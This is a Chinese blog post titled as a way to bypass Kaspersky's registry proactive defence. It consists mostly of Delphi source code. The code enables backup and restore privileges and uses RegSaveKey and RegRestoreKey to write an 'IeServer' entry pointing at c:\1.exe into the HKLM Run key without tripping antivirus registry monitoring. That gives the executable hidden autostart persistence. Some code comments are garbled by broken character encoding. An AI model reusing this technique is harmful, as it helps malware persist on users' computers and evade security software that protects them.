过卡巴注册表主动防御- 洋葱圈

Home

电脑技术

编程技术

过卡巴注册表主动防御

作者：洋葱圈

周四, 12 6月 2008 20:48

Tags: 注册表备份利用网上不是

累，昨夜醉酒，一大早就起来看程序，呼呼，修改了一下原有的备份注册表（原来是用REG命令来备份HIV文件的），利用COPYKEY来备份注册表了，而不是网上那种利用HIV资源形式还原注册表，在偶的电脑上面测试成功！

1
2
3
4
5
6

7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

28
29
30

31

32
33
34
35
36
37
38

39

40

41
42

43
44
45
46
47
48
49
50
51
52

53

54
55
56

57
58
59
60
61

62
63
64
65
66

67
68
69
70
71
72

73
74
75
76
77

78
79
80
81
82
83
84
85
86
87
88
89
90
91
92

93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119

120

121

122

123
124

125
126
127
128
129
130
131
132
133
134
135
136 unit Unit1; interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, StdCtrls; type TForm1 = class(TForm) Button1: TButton; procedure Button1Click(Sender: TObject); private { Private declarations } public { Public declarations } end; var Form1: TForm1; implementation {$R *.dfm} procedure SetPrivilege; Const ADJUST_PRIV = TOKEN_QUERY or TOKEN_ADJUST_PRIVILEGES; SHTDWN_PRIV ='SeBackupPrivilege'; //SeBackupPrivilege 备份文件和目录。 //å��è®¸ç�¨æ�·ç»�è¿�æ��ä»¶å��ç�®å½�ç��æ��é��æ�¥å��å¤�ä» ½ã��å�ªæ��å½�åº�ç�¨ç¨�åº�å°�è¯�è®¿é�®NTFSå¤�ä»½APIæ�¶ 才检查这个特 //æ��ã��é»�è®¤æ��å�µä¸�ï¼�è¿�ä¸ªç�¹æ��å��é��ç»�Administ rators和Backup Operators。 PRIV_SIZE = sizeOf(TTokenPrivileges); var TokenPriv, Dummy: TTokenPrivileges; Token: THandle; Len:DWORD; begin OpenProcessToken(GetCurrentProcess(), ADJUST_PRIV, Token); LookupPrivilegeValue(nil, SHTDWN_PRIV,TokenPriv.Privileges[0].Luid); TokenPriv.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED; TokenPriv.PrivilegeCount := 1; AdjustTokenPrivileges(Token, false, TokenPriv, PRIV_SIZE,Dummy, Len); end; procedure SetPrivilege2; var TPPrev,TP: TTokenPrivileges; TokenHandle: THandle; dwRetLen: DWORD; lpLuid: TLargeInteger; begin OpenProcessToken(GetCurrentProcess,TOKEN_ALL_ACCESS,T okenHandle); if(LookupPrivilegeValue(Nil,'SeRestorePrivilege',lpLu id))then //SeRestorePrivilege //恢复文件和目录。 //å��è®¸ç�¨æ�·ç»�è¿�æ��ä»¶å��ç�®å½�æ��é��æ�¥æ�¢å¤�å¤�ä» �文件。默认情况下Administrators和Backup begin TP.PrivilegeCount:=1; TP.Privileges[0].Attributes:=SE_PRIVILEGE_ENABLED; TP.Privileges[0].Luid:=lpLuid; AdjustTokenPrivileges(TokenHandle,False,TP,SizeOf(T PPrev),TPPrev,dwRetLen); end; CloseHandle(TokenHandle); end; function addreg(key:Hkey; subkey,name,value:string):boolean; var regkey:hkey; begin result := false; RegCreateKey(key,PChar(subkey),regkey); if RegSetValueEx(regkey,Pchar(name),0,REG_EXPAND_SZ,p char(value),length(value)) = 0 then result := true; RegCloseKey(regkey); end; function SaveKey2(key:integer;subkey,filename:string):Boolean; var SKey: HKEY; begin SetPrivilege; Result := false; if key = 1 then begin RegOpenKey(HKEY_CURRENT_USER,PChar(subkey),SKey); end else begin RegOpenKey(HKEY_LOCAL_MACHINE,PChar(subkey),SKey); end; if SKey <> 0 then try Result := (RegSaveKey(SKey, PChar(FileName), nil) = ERROR_SUCCESS); finally RegCloseKey(SKey); end; end; procedure regstore2(key:integer;subkey,hfile:string); var key2: hkey; begin SetPrivilege2; if key=1 then begin RegOpenKey(HKEY_CURRENT_USER,PChar(subkey),key2) end else begin RegOpenKey(HKEY_LOCAL_MACHINE,PChar(subkey),key2); end; if key2<>0 then RegRestoreKey(key2,PChar(hfile),8); RegCloseKey(key2); end; procedure regstore(exefile:string); var key:HKEY; I:Integer; begin SaveKey2(2,PChar('SOFTWARE\Microsoft\Windows\CurrentV ersion\Run'),'c:\1.hiv'); RegCreateKey(HKEY_CURRENT_USER,PChar('Software\fengzi '),key); for i := 1 to 5 do regstore2(1,'Software\fengzi','c:\1.hiv'); addreg(HKEY_CURRENT_USER,'Software\fengzi','IeServer' ,exefile); SaveKey2(1,PChar('Software\fengzi'),'c:\2.hiv'); for i := 1 to 5 do regstore2(2,PChar('SOFTWARE\Micro soft\Windows\CurrentVersion\Run'),'c:\2.hiv'); RegDeleteKey(HKEY_CURRENT_USER,'Software\fengzi'); RegCloseKey(key); DeleteFile('c:\1.hiv'); DeleteFile('c:\2.hiv'); end; procedure TForm1.Button1Click(Sender: TObject); begin regstore('c:\1.exe'); end; end.